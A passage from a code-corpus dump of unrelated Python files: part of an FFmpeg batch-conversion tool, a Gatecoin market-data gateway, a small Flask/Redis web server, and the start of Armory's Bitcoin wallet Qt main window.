files_out[join(odir, sub(filt_group, '',\
splitext(split(f)[1])[0]) + apnd + ext_out)].append((f, sz))
count += 1
size += sz
yield files_out, count, dir_count, size, ignored
elif isdir(f):
dir_count -= 1
for root, _, files in os.walk(f):
dir_count += 1
if not files:
continue
root = abspath(root)
sdir = root.replace(f, '').strip(sep)
for filename in files:
filepath = join(root, filename)
if isfile(filepath) and match(filt_in, filepath):
sz = getsize(filepath)
files_out[join(odir, sdir, sub(filt_group, '',\
splitext(filename)[0]) + apnd + ext_out)].\
append((filepath, sz))
count += 1
size += sz
else:
fname, ext = splitext(filename)
ignored[ext if ext else fname] += 1
yield files_out, count, dir_count, size, ignored
else:
fname, ext = splitext(f)
ignored[ext if ext else fname] += 1
yield files_out, count, dir_count, size, ignored
yield sorted(files_out.items(), key=lambda x: x[0]), count, dir_count,\
size, ignored
def gen_cmd(self, files):
'''
Takes a list of input / output files and returns the full FFmpeg
command for each output file.
:Parameters:
`files`: list
The list of tuples of all the input / output files.
It is the list of files returned in the first element in the
tuple by :attr:`enumerate_files`.
:return:
A list of tuples. Each 5-tuple is the full FFmpeg command line
(string), the total size of the input files for that output
file, the number of input files, the first input file for this
output file, and the output file name.
'''
merge_type = self.merge_type
audio = self.out_audio
s = self.input_start
e = self.input_end
seeking = ''
if s:
seeking = ' -ss {:.3f}'.format(s)
if e:
seeking = '{} -t {:.3f}'.format(seeking, e)
opts = ' {}'.format(self.add_command) if self.add_command else ''
if self.out_codec == 'h264':
opts += ' -vcodec libx264 -preset {} -crf {}'.\
format(self.compress_speed, self.crf)
elif self.out_codec == 'raw':
opts += ' -vcodec rawvideo'
if not audio:
opts += ' -an'
opts += ' -y' if self.out_overwrite else ' -n'
opts = '{} -threads {}'.format(opts, self.num_threads if
self.num_threads != 'auto' else '0')
res = []
for dst, src_list in files:
src = sorted([f[0] for f in src_list])
inames = ' -i "{}"'.format('" -i "'.join(src))
merge_cmd = ''
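            # Overlay layouts: two inputs sit side by side on a double-width
            # pad; three or four inputs are tiled on a 2x2 grid, each extra
            # stream overlaid at the w/h offsets below.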
if merge_type == 'overlay' and len(src) > 1:
merge_cmd = ' -filter_complex '
if len(src) == 2:
merge_cmd = ' -filter_complex "[0:0]pad=iw*2:ih[a];'\
'[a][1:0]overlay=w" -shortest'
elif len(src) == 3:
merge_cmd = ' -filter_complex "[0:0]pad=iw*2:ih*2[a];'\
'[a][1:0]overlay=w[b];[b][2:0]overlay=0:h" -shortest'
elif len(src) == 4:
merge_cmd = ' -filter_complex "[0:0]pad=iw*2:ih*2[a];'\
'[a][1:0]overlay=w[b];[b][2:0]overlay=0:h[c];[c][3:0]'\
'overlay=w:h" -shortest'
elif merge_type == 'concatenate' and len(src) > 1:
if audio:
base_str = ('[{}:0] [{}:1] ' * len(src)).format(\
*[int(i / 2) for i in range(2 * len(src))])
merge_cmd = ' -filter_complex \'{} concat=n={:d}:v=1:a=1 '\
'[v] [a]\' -map \'[v]\' -map \'[a]\''.\
format(base_str, len(src))
else:
base_str = ('[{}:0] ' * len(src)).format(*range(len(src)))
merge_cmd = ' -filter_complex \'{} concat=n={:d}:v=1 '\
'[v]\' -map \'[v]\''.format(base_str, len(src))
res.append(('"{}"{}{}{}{} "{}"'.format(self.ffmpeg_path, inames,
seeking, merge_cmd, opts, dst), sum([f[1] for f in src_list]),
len(src), src[0], dst))
return res
def process_thread(self):
''' The thread that processes the input / output files. It communicates
with the outside world using :attr:`queue`.
Upon exit, it sets :attr:`running` to False.
'''
queue = self.queue
put = queue.put
clock = time.clock
merge_type = self.merge_type
put('clean', None)
pre = self.pre_process
pre_pat = self.pre_process_pat
try:
pre_pat = re.compile(pre_pat)
except Exception, e:
put('failure', e.message)
self.running = False
return
itr = self.enumerate_files()
try:
s = time.clock()
while True:
if self.finish:
raise FilerException('Processing terminated by user.')
files, count, dir_count, size, ignored = itr.next()
e = time.clock()
if e - s > 0.3:
s = e
put('count', (len(files), count, dir_count, size, ignored))
except StopIteration:
pass
except FilerException, e:
put('failure', e.message)
self.running = False
return
self.error_list = []
self.success_list = []
file_str = '\n'.join(['{} <-- {}'.format(k, ','.join([vv[0] for vv in\
v])) for k, v in files])
ignored_str = '\n'.join(['{}:{:d}'.format(k, v) for k, v in
dict(ignored).iteritems()])
self.report = 'File list:\n{}\nIgnored list:\n{}\n'.format(file_str,
ignored_str)
put('count_done', (len(files), count, dir_count, size, ignored))
for k, v in files:
if len(v) > 1 and merge_type == 'none':
put('failure', 'More than one input file was provided for a '\
'single output file, and merge was not specified.')
self.running = False
return
            if len(v) > 1 and pre:
                put('failure', 'More than one input file was provided for a '\
                    'single output file; pre-processing does not support '\
                    'merged outputs.')
self.running = False
return
elif len(v) > 4 and merge_type == 'overlay':
                put('failure', 'More than 4 input files were provided for a '\
'single output file - not currently supported for overlay.'
)
self.running = False
return
error_list = self.error_list
success_list = self.success_list
out_size_done = 0
out_size_total = 0
in_size_done = 0
in_size_total = size
in_count_done = 0
in_count_total = count
out_count_done = 0
out_count_total = len(files)
bps = 0.
time_total = 0.
elapsed = 0.0000001
ts = clock()
t_left = 0
for cmd, fsize, fcount, src, dst in self.gen_cmd(files):
try:
if self.finish or self.pause:
elapsed = clock() - ts
while self.pause and not self.finish:
sleep(.1)
if self.finish:
put('failure', 'Processing terminated by user.')
self.running = False
return
ts = clock()
d = dirname(dst)
if not exists(d):
try:
makedirs(d)
except Exception as e:
pass
if pre:
info = sp.STARTUPINFO()
info.dwFlags = sp.STARTF_USESHOWWINDOW
info.wShowWindow = sp.SW_HIDE
sprocess = sp.Popen(pre.format(src), stdout=sp.PIPE,
stderr=sp.PIPE, stdin=sp.PIPE, startupinfo=info)
sprocess.stdin.close()
stdoutdata, stderrdata = sprocess.communicate()
if sprocess.wait():
raise FilerException('Pre process error: \n{}\n{}'.\
format(stdoutdata, stderrdata))
m = match(pre_pat, stdoutdata)
if not m:
raise FilerException('Match not found in pre'
'-processing output')
cmd = cmd.format(*m.groups())
put('file_cmd', cmd)
info = sp.STARTUPINFO()
info.dwFlags = sp.STARTF_USESHOWWINDOW
info.wShowWindow = sp.SW_HIDE
sprocess = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE,
stdin=sp.PIPE, startupinfo=info)
sprocess.stdin.close()
stdoutdata, stderrdata = sprocess.communicate()
if sprocess.wait():
raise FilerException('Process error: \n{}\n{}'.\
format(stdoutdata, stderrdata))
out_size_done += getsize(dst)
in_size_done += fsize
in_count_done += fcount
out_count_done += 1
time_total = clock() - ts + elapsed
bps = in_size_done / time_total
out_size_total = int(in_size_total / float(in_size_done) *
out_size_done)
t_left = (in_size_total - in_size_done) / bps
put('file_stat', (out_size_done, out_size_total, in_size_done,
in_size_total, in_count_done, in_count_total,
out_count_done, out_count_total, bps,
time_total, t_left))
success_list.append('{}\n{}'.format(cmd, stderrdata))
except Exception as e:
in_size_total -= fsize
msg = '{}\n{}'.format(cmd, e.message)
error_list.append(msg)
put('skipped', msg)
put('done', None)
self.running = False
"""
|
gatecoin.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
import time
import threading
from functools import partial
from datetime import datetime
class ExchGwApiGatecoin(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_trade_timestamp_field_name(cls):
return 'transactionTime'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_price_field_name(cls):
return 'price'
@classmethod
def get_order_book_volume_field_name(cls):
return 'volume'
@classmethod
def get_trade_side_field_name(cls):
return 'way'
@classmethod
def get_trade_id_field_name(cls):
return 'transactionId'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'quantity'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.gatecoin.com/Public/MarketDepth/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://api.gatecoin.com/Public/Transactions/%s?since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://api.gatecoin.com/Public/Transactions/%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
l2_depth = L2Depth()
# Bids
bids = raw[cls.get_bids_field_name()]
bid_level = -1
for bid in bids:
price = bid[cls.get_order_book_price_field_name()]
volume = bid[cls.get_order_book_volume_field_name()]
if bid_level == -1 or l2_depth.bids[bid_level].price != price:
bid_level += 1
if bid_level < 5:
l2_depth.bids[bid_level].price = float(price)
else:
break
l2_depth.bids[bid_level].volume += float(volume)
# Asks
asks = raw[cls.get_asks_field_name()]
ask_level = -1
for ask in asks:
price = ask[cls.get_order_book_price_field_name()]
volume = ask[cls.get_order_book_volume_field_name()]
if ask_level == -1 or l2_depth.asks[ask_level].price != price:
ask_level += 1
if ask_level < 5:
l2_depth.asks[ask_level].price = float(price)
else:
break
l2_depth.asks[ask_level].volume += float(volume)
return l2_depth
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
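    # Example (sketch): raw bids [{'price': 100, 'volume': 1},
    # {'price': 100, 'volume': 2}] collapse into a single level with
    # bids[0].price == 100.0 and bids[0].volume == 3.0; only the first five
    # distinct price levels per side are kept.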
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trade_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trade_timestamp_field_name()])
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
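            # NOTE: the 'way' field named by get_trade_side_field_name() is
            # not consulted here; the side is hard-coded to 1 in this gateway.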
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if 'transactions' in res.keys():
trades_raw = res['transactions']
if len(trades_raw) > 0:
for t in trades_raw:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwGatecoin(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
        :param db_clients: List of database clients
"""
ExchangeGateway.__init__(self, ExchGwApiGatecoin(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Gatecoin'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
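                # Persist a snapshot only when the book differs from the
                # previous poll; unchanged polls are skipped.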
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
        Get trades worker thread
        :param instmt: Instrument
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                # 'ret' may be undefined here; retry instead of falling through
                time.sleep(1)
                continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Gatecoin'
instmt_name = 'BTCHKD'
instmt_code = 'BTCHKD'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwGatecoin([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_order_book_table_name(exch.get_order_book_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_trades_table_name(exch.get_trades_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
server.py
|
import sys
import os
from datetime import timedelta
import threading
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(os.path.split(rootPath)[0])
from src.web.web_util.web_util import judge_pool, get_redis_conn, begin_check_redis
from flask import Flask, render_template,session
from src.web.controller.dataController import data, POOL_FLAG
from src.web.controller.spiderController import spider
from src.util.constant import WAITING_USER_LIST
from flask_cors import *
app = Flask(__name__)
CORS(app, supports_credentials=True)  # enable cross-origin requests (CORS)
app.config['SECRET_KEY'] = os.urandom(24)
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=7)
host = judge_pool()
conn = get_redis_conn(host)
conn.delete(WAITING_USER_LIST)
@app.route('/')
def config():
session[POOL_FLAG] = judge_pool()
print("pool flag:", session.get(POOL_FLAG))
return render_template("config.html")
@app.route('/error')
def error():
return render_template("error.html")
@app.route('/cookie')
def cookie():
return render_template("cookie.html")
app.register_blueprint(spider, url_prefix='/spider')
app.register_blueprint(data, url_prefix='/data')
if __name__ == '__main__':
t = threading.Thread(target=begin_check_redis)
t.start()
app.run(host='0.0.0.0', port=5000, debug=False)
|
ArmoryQt.py
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
################################################################################
# #
# Copyright (C) 2011-2015, Armory Technologies, Inc. #
# Distributed under the GNU Affero General Public License (AGPL v3) #
# See LICENSE or http://www.gnu.org/licenses/agpl.html #
# #
################################################################################
import gettext
from copy import deepcopy
from datetime import datetime
import hashlib
import logging
import math
import os
import platform
import random
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import webbrowser
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import psutil
from twisted.internet.defer import Deferred
from twisted.internet.protocol import Protocol, ClientFactory
import CppBlockUtils as Cpp
from announcefetch import AnnounceDataFetcher, ANNOUNCE_URL, ANNOUNCE_URL_BACKUP, \
DEFAULT_FETCH_INTERVAL
from armorycolors import Colors, htmlColor, QAPP
from armoryengine.ALL import *
from armoryengine.Block import PyBlock
from armoryengine.Decorators import RemoveRepeatingExtensions
from armoryengine.PyBtcWalletRecovery import WalletConsistencyCheck
from armoryengine.parseAnnounce import changelogParser, downloadLinkParser, \
notificationParser
from armorymodels import *
from jasvet import verifySignature
import qrc_img_resources
from qtdefines import *
from qtdialogs import *
from ui.MultiSigDialogs import DlgSelectMultiSigOption, DlgLockboxManager, \
DlgMergePromNotes, DlgCreatePromNote, DlgImportAsciiBlock
from ui.VerifyOfflinePackage import VerifyOfflinePackageDialog
from ui.Wizards import WalletWizard, TxWizard
from ui.toolsDialogs import MessageSigningVerificationDialog
from dynamicImport import MODULE_PATH_KEY, ZIP_EXTENSION, getModuleList, importModule,\
verifyZipSignature, MODULE_ZIP_STATUS, INNER_ZIP_FILENAME,\
MODULE_ZIP_STATUS_KEY, getModuleListNoZip, dynamicImportNoZip
import tempfile
# Load our framework with OS X-specific code.
if OS_MACOSX:
import ArmoryMac
# HACK ALERT: Qt has a bug in OS X where the system font settings will override
# the app's settings when a window is activated (e.g., Armory starts, the user
# switches to another app, and then switches back to Armory). There is a
# workaround, as used by TeXstudio and other programs.
# https://bugreports.qt-project.org/browse/QTBUG-5469 - Bug discussion.
# http://sourceforge.net/p/texstudio/bugs/594/?page=1 - Fix is mentioned.
# http://pyqt.sourceforge.net/Docs/PyQt4/qapplication.html#setDesktopSettingsAware
# - Mentions that this must be called before the app (QAPP) is created.
if OS_MACOSX:
QApplication.setDesktopSettingsAware(False)
if OS_WINDOWS:
from _winreg import *
MODULES_ZIP_DIR_NAME = 'modules'
class ArmoryMainWindow(QMainWindow):
""" The primary Armory window """
#############################################################################
def __init__(self, parent=None, splashScreen=None):
super(ArmoryMainWindow, self).__init__(parent)
self.isShuttingDown = False
# Load the settings file
self.settingsPath = CLI_OPTIONS.settingsPath
self.settings = SettingsFile(self.settingsPath)
# SETUP THE WINDOWS DECORATIONS
self.lblLogoIcon = QLabel()
if USE_TESTNET:
self.setWindowTitle('Armory - Bitcoin Wallet Management [TESTNET]')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
else:
self.setWindowTitle('Armory - Bitcoin Wallet Management')
self.iconfile = ':/armory_icon_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_h44.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_h56.png'))
# OS X requires some Objective-C code if we're switching to the testnet
# (green) icon. We should also use a larger icon. Otherwise, Info.plist
# takes care of everything.
if not OS_MACOSX:
self.setWindowIcon(QIcon(self.iconfile))
else:
self.notifCtr = ArmoryMac.MacNotificationHandler.None
if USE_TESTNET:
self.iconfile = ':/armory_icon_green_fullres.png'
ArmoryMac.MacDockIconHandler.instance().setMainWindow(self)
ArmoryMac.MacDockIconHandler.instance().setIcon(QIcon(self.iconfile))
self.lblLogoIcon.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
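# Runtime state: flags, caches, and buffers used throughout the session,
# initialized up front so later code can assume they exist.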
self.netMode = NETWORKMODE.Offline
self.abortLoad = False
self.memPoolInit = False
self.needUpdateAfterScan = True
self.sweepAfterScanList = []
self.newWalletList = []
self.newZeroConfSinceLastUpdate = []
self.lastSDMState = BDM_UNINITIALIZED
self.doShutdown = False
self.downloadDict = {}
self.notAvailErrorCount = 0
self.satoshiVerWarnAlready = False
self.satoshiLatestVer = None
self.latestVer = {}
self.satoshiHomePath = None
self.satoshiExeSearchPath = None
self.initSyncCircBuff = []
self.lastVersionsTxtHash = ''
self.dlgCptWlt = None
self.torrentFinished = False
self.torrentCircBuffer = []
self.lastAskedUserStopTorrent = 0
self.wasSynchronizing = False
self.announceIsSetup = False
self.entropyAccum = []
self.allLockboxes = []
self.lockboxIDMap = {}
self.cppLockboxWltMap = {}
# Full list of notifications, and notify IDs that should trigger popups
# when sending or receiving.
self.lastAnnounceUpdate = {}
self.changelog = []
self.downloadLinks = {}
self.almostFullNotificationList = {}
self.notifyOnSend = set()
self.notifyOnRecv = set()
self.versionNotification = {}
self.notifyIgnoreLong = []
self.notifyIgnoreShort = []
self.maxPriorityID = None
self.satoshiVersions = ['',''] # [curr, avail]
self.armoryVersions = [getVersionString(BTCARMORY_VERSION), '']
self.NetworkingFactory = None
self.tempModulesDirName = None
self.internetStatus = None
# We only need a single connection to bitcoind since it's a
# reconnecting connection, so we keep it around.
self.SingletonConnectedNetworkingFactory = None
# Kick off announcement checking, unless they explicitly disabled it
# The fetch happens in the background, we check the results periodically
self.announceFetcher = None
self.setupAnnouncementFetcher()
#delayed URI parsing dict
self.delayedURIData = {}
self.delayedURIData['qLen'] = 0
#Setup the signal to spawn progress dialogs from the main thread
self.connect(self, SIGNAL('initTrigger') , self.initTrigger)
self.connect(self, SIGNAL('execTrigger'), self.execTrigger)
self.connect(self, SIGNAL('checkForNegImports'), self.checkForNegImports)
#generic signal to run any method passed as the arg
self.connect(self, SIGNAL('method_signal') , self.method_signal)
#push model BDM notify signal
self.connect(self, SIGNAL('cppNotify'), self.handleCppNotification)
TheBDM.registerCppNotification(self.cppNotifySignal)
# We want to determine whether the user just upgraded to a new version
self.firstLoadNewVersion = False
currVerStr = 'v'+getVersionString(BTCARMORY_VERSION)
if self.settings.hasSetting('LastVersionLoad'):
lastVerStr = self.settings.get('LastVersionLoad')
if not lastVerStr==currVerStr:
LOGINFO('First load of new version: %s', currVerStr)
self.firstLoadNewVersion = True
self.settings.set('LastVersionLoad', currVerStr)
# Because dynamically retrieving addresses for querying transaction
# comments can be so slow, I use this txAddrMap to cache the mappings
# between tx's and addresses relevant to our wallets. It really only
# matters for massive tx with hundreds of outputs -- but such tx do
# exist and this is needed to accommodate wallets with lots of them.
self.txAddrMap = {}
def updateProgress(val):
if splashScreen is not None:
splashScreen.updateProgress(val)
self.loadWalletsAndSettings(updateProgress)
eulaAgreed = self.getSettingOrSetDefault('Agreed_to_EULA', False)
if not eulaAgreed:
DlgEULA(self,self).exec_()
if not self.abortLoad:
self.setupNetworking()
# setupNetworking may have set this flag if something went wrong
if self.abortLoad:
LOGWARN('Armory startup was aborted. Closing.')
os._exit(0)
# We need to query this once at the beginning, to avoid having
# strange behavior if the user changes the setting but hasn't
# restarted yet...
self.doAutoBitcoind = \
self.getSettingOrSetDefault('ManageSatoshi', not OS_MACOSX)
# This is a list of alerts that the user has chosen to no longer
# be notified about
alert_str = str(self.getSettingOrSetDefault('IgnoreAlerts', ""))
if alert_str == "":
alerts = []
else:
alerts = alert_str.split(",")
self.ignoreAlerts = {int(s):True for s in alerts}
# If we're going into online mode, start loading blockchain
if self.doAutoBitcoind:
self.startBitcoindIfNecessary()
else:
self.loadBlockchainIfNecessary()
# Setup system tray and register "bitcoin:" URLs with the OS
self.setupSystemTray()
self.setupUriRegistration()
self.heartbeatCount = 0
self.extraHeartbeatSpecial = []
self.extraHeartbeatAlways = []
self.extraHeartbeatOnline = []
self.extraNewTxFunctions = []
self.extraNewBlockFunctions = []
self.extraShutdownFunctions = []
self.extraGoOnlineFunctions = []
self.walletDialogDict = {}
self.lblArmoryStatus = QRichLabel(tr('<font color="%(color)s">Offline</font> ') %
{ 'color' : htmlColor('TextWarn') }, doWrap=False)
self.statusBar().insertPermanentWidget(0, self.lblArmoryStatus)
# Table for all the wallets
self.walletModel = AllWalletsDispModel(self)
self.walletsView = QTableView(self)
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.walletsView.setModel(self.walletModel)
self.walletsView.setSelectionBehavior(QTableView.SelectRows)
self.walletsView.setSelectionMode(QTableView.SingleSelection)
self.walletsView.verticalHeader().setDefaultSectionSize(sectionSz)
self.walletsView.setMinimumSize(viewWidth, viewHeight)
self.walletsView.setItemDelegate(AllWalletsCheckboxDelegate(self))
self.walletsView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.walletsView.hideColumn(0)
if self.usermode == USERMODE.Standard:
initialColResize(self.walletsView, [20, 0, 0.35, 0.2, 0.2])
else:
initialColResize(self.walletsView, [20, 0.15, 0.30, 0.2, 0.20])
if self.settings.hasSetting('LastFilterState'):
if self.settings.get('LastFilterState')==4:
self.walletsView.showColumn(0)
self.connect(self.walletsView, SIGNAL('doubleClicked(QModelIndex)'),
self.execDlgWalletDetails)
self.connect(self.walletsView, SIGNAL('clicked(QModelIndex)'),
self.execClickRow)
self.walletsView.setColumnWidth(WLTVIEWCOLS.Visible, 20)
w,h = tightSizeNChar(GETFONT('var'), 100)
# Prepare for tableView slices (i.e. "Showing 1 to 100 of 382", etc)
self.numShowOpts = [100,250,500,1000,'All']
self.sortLedgOrder = Qt.AscendingOrder
self.sortLedgCol = 0
self.currLedgMin = 1
self.currLedgMax = 100
self.currLedgWidth = 100
# Table to display ledger/activity
self.ledgerTable = []
self.ledgerModel = LedgerDispModelSimple(self.ledgerTable, self, self)
self.ledgerModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForWallets())
self.ledgerModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.frmLedgUpDown = QFrame()
self.ledgerView = ArmoryTableView(self, self, self.frmLedgUpDown)
self.ledgerView.setModel(self.ledgerModel)
self.ledgerView.setSortingEnabled(True)
self.ledgerView.setItemDelegate(LedgerDispDelegate(self))
self.ledgerView.setSelectionBehavior(QTableView.SelectRows)
self.ledgerView.setSelectionMode(QTableView.SingleSelection)
self.ledgerView.verticalHeader().setDefaultSectionSize(sectionSz)
self.ledgerView.verticalHeader().hide()
self.ledgerView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.ledgerView.horizontalHeader().setResizeMode(3, QHeaderView.Fixed)
self.ledgerView.hideColumn(LEDGERCOLS.isOther)
self.ledgerView.hideColumn(LEDGERCOLS.UnixTime)
self.ledgerView.hideColumn(LEDGERCOLS.WltID)
self.ledgerView.hideColumn(LEDGERCOLS.TxHash)
self.ledgerView.hideColumn(LEDGERCOLS.isCoinbase)
self.ledgerView.hideColumn(LEDGERCOLS.toSelf)
self.ledgerView.hideColumn(LEDGERCOLS.DoubleSpend)
# Another table and model, for lockboxes
self.currentLBPage = 0
self.lockboxLedgTable = []
self.lockboxLedgModel = LedgerDispModelSimple(self.lockboxLedgTable,
self, self, isLboxModel=True)
self.lockboxLedgModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForLockboxes())
self.lockboxLedgModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.lbDialogModel = None
dateWidth = tightSizeStr(self.ledgerView, '_9999-Dec-99 99:99pm__')[0]
nameWidth = tightSizeStr(self.ledgerView, '9'*32)[0]
cWidth = 20 # num-confirm icon width
tWidth = 72 # date icon width
initialColResize(self.ledgerView, [cWidth, 0, dateWidth, tWidth, 0.30, 0.40, 0.3])
self.connect(self.ledgerView, SIGNAL('doubleClicked(QModelIndex)'), \
self.dblClickLedger)
self.ledgerView.setContextMenuPolicy(Qt.CustomContextMenu)
self.ledgerView.customContextMenuRequested.connect(self.showContextMenuLedger)
btnAddWallet = QPushButton(tr("Create Wallet"))
btnImportWlt = QPushButton(tr("Import or Restore Wallet"))
self.connect(btnAddWallet, SIGNAL('clicked()'), self.startWalletWizard)
self.connect(btnImportWlt, SIGNAL('clicked()'), self.execImportWallet)
# Put the Wallet info into its own little box
lblAvail = QLabel(tr("<b>Available Wallets:</b>"))
viewHeader = makeLayoutFrame(HORIZONTAL, [lblAvail, \
'Stretch', \
btnAddWallet, \
btnImportWlt, ])
wltFrame = QFrame()
wltFrame.setFrameStyle(QFrame.Box|QFrame.Sunken)
wltLayout = QGridLayout()
wltLayout.addWidget(viewHeader, 0,0, 1,3)
wltLayout.addWidget(self.walletsView, 1,0, 1,3)
wltFrame.setLayout(wltLayout)
# Make the bottom 2/3 a tabwidget
self.mainDisplayTabs = QTabWidget()
# Put the labels into scroll areas just in case window size is small.
self.tabDashboard = QWidget()
self.setupDashboard()
# Combo box to filter ledger display
self.comboWltSelect = QComboBox()
self.populateLedgerComboBox()
self.connect(self.ledgerView.horizontalHeader(), \
SIGNAL('sortIndicatorChanged(int,Qt::SortOrder)'), \
self.changeLedgerSorting)
self.connect(self.comboWltSelect, SIGNAL('activated(int)'),
self.changeWltFilter)
self.lblTot = QRichLabel('<b>Maximum Funds:</b>', doWrap=False)
self.lblSpd = QRichLabel('<b>Spendable Funds:</b>', doWrap=False)
self.lblUcn = QRichLabel('<b>Unconfirmed:</b>', doWrap=False)
self.lblTotalFunds = QRichLabel('-'*12, doWrap=False)
self.lblSpendFunds = QRichLabel('-'*12, doWrap=False)
self.lblUnconfFunds = QRichLabel('-'*12, doWrap=False)
self.lblTotalFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpendFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUnconfFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblTot.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpd.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUcn.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblBTC1 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC2 = QRichLabel('<b>BTC</b>', doWrap=False)
